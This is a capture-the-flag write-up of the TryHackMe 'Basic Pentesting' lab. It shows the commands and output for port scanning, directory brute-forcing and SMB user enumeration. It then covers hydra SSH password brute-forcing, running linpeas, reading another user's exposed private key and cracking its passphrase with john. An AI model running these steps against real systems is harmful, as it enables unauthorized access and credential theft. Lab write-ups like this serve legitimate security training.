🕵️‍♀️Basic Pentesting

This is a machine that allows you to practice web app hacking and privilege escalation

1. Reconnaissance

1.1 Nmap

Using nmap to scan for open ports and services

nmap -sV -oA nmap-inital 10.10.60.79 

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 19:41 IST
Nmap scan report for 10.10.60.79
Host is up (0.19s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13?
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http-proxy
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 197.68 seconds

We find open tcp ports 22, 80, 139, 445, 8009, and 8080

2. Scanning

2.1 Gobuster

Using gobuster to brute-force directories.

gobuster dir -u http://10.10.60.79 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.60.79
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/27 19:46:55 Starting gobuster in directory enumeration mode
===============================================================
/development          (Status: 301) [Size: 316] [--> http://10.10.60.79/development/]

We find a /development directory

2.2 Web Server

Visiting the IP address in the browser, we are greeted with a webpage

Going over to /development , we find 2 txt files

dev.txt

Here we find a conversation between two users referred to as k and j about the use of an outdated apache struts version.

j.txt

From this conversation, we can conclude that user j is using a weak password which can be easily cracked.

2.3 Enum4linux

We can use Enum4linux for further enumeration via SMB (port 445)

enum4linux -a 10.10.60.79

======================================
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
======================================

From the output, we can conclude that k and j referred earlier are users kay and jen respectively.

3. Gaining Access

3.1 Hydra

Using Hydra to brute-force jan's ssh password.

hydra  -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.60.79:22

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-27 20:17:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.60.79:22/
[22][ssh] host: 10.10.60.79   login: jan   password: armando

We get the credentials jan : armando

ssh jan@10.10.60.79 
jan@10.10.60.79 s password: 

jan@basic2:~$

4. Privilege Escalation

We need to be user kay to view the pass.bak file located in their home directory.

4.1 LinPeas

Linpeas is a script that searches for possible privilege escalation vectors

Downloading the script in the attacker machine and copying it to the target via scp to the /tmp directory

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64

scp linpeas_linux_amd64 jan@10.10.60.79:/tmp
jan@10.10.60.79s password: 

linpeas_linux_amd64             100% 3068KB 576.6KB/s   00:05

Executing the script on the target machine

jan@basic2:/tmp$ ls

hsperfdata_tomcat9  linpeas_linux_amd64  systemd-private-fcbeb8934d994f169abec145d45f0252-systemd-timesyncd.service-Z5YHRG

jan@basic2:/tmp$ chmod +x linpeas_linux_amd64

jan@basic2:/tmp$ ./linpeas_linux_amd64

From the output we can find that kay has his ssh private key in /home/kay/.ssh/id_rsa .

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)

-rw-r--r-- 1 kay kay 3326 Apr 19  2018 /home/kay/.ssh/id_rsa

Since it is readable by anyone, we can use the key to login as kay

jan@basic2:/home/kay/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
jan@basic2:/home/kay/.ssh$ cat id_rsa

Copying the key to our attacker machine as kay_id_rsa and changing its permission to only read-write by owner

nano kay_id_rsa                                                        chmod 600 kay_id_rsa

SSHing as kay

ssh -i kay_id_rsa kay@10.10.60.79                                      
Enter passphrase for key 'kay_id_rsa':

We find that the key is password protected

4.2 ssh2john

ssh2john is a part of JohnTheRipper and is used to crack ssh passphrases.

Using ssh2john and kay_id_rsa as input to generate an output readable by john by saving it to forjohn.txt

python /usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt

Using john to bruteforce forjohn.txt to obtain the ssh passphrase

john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt            
beeswax          (kay_id_rsa)
Session completed

We get beeswax as the passphrase

ssh as kay with kay_id_rsa and beeswax to view pass.bak

kay@basic2:~$ ls 
pass.bak
kay@basic2:~$ cat pass.bak

PreviousTryHackMe NextBlue

Last updated 3 years ago